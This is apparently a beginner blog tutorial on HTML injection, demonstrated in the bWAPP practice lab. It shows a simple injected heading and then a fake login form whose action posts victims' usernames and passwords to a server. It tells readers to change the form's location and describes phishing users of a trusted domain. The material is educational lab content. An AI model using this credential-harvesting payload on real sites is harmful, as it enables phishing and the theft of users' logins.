HTML Injection Step by Step For Begineers
Hello guys, hope you were doing good and practising so today in this post we will discuss about HTML injection and why HTML injection is risky.
What is HTML injection ?
HTML Injection, Hyper Text Markup Language Injection is a vulnerability which allows an attacker to inject a malicious script via specific parameter. Also HTML Injection is referred as a virtual defacement of web application.
The possible attveack scenario are demonstrated below
- An attacker can find a vulnerability and perform HTML injection vulnerability.
- An attacker can do phishing from the vulnerable website and send email to victim.
- The user visits the page due to the trust worthy domain and can Enter User Id and password which is sent to attacker server.
So lets start ..
- Firstly you need to find a website which is vulnerable to HTML Injection. Here I am using bWAPP lab.
- Here I have opened the page which is vulnerable to HTML injection. Just add your HTML code as shown below.
3. As you can see I add my simple <h1> ahmed </h1> code and executed. this code is executed.
4. Now lets try with some html More html tag such as bold, colour, background e.t.c.
See the above image i have modified its look using some basic tags. You can also perform XSS attack using HTML Injection as shown in below image.
So let’s try to create a login form using this code.
<form action=”http://127.0.0.1/login.php” method=”POST”> Username: <input type=”text” name=”username”><br> Password: <input type=”password” name=”pass”><br> <input type=”submit” value=”Login”></form>
Make your any page or you can add you deface page change this code and and change you location.
<form action=”http://127.0.0.1/login.php” method=”POST”>
Just login with any username and password and see what happens.
This page is shown after login of victim 🙁 and we got successfully ID and Password.
Keep Learning.. and Injecting but don’t harm an site.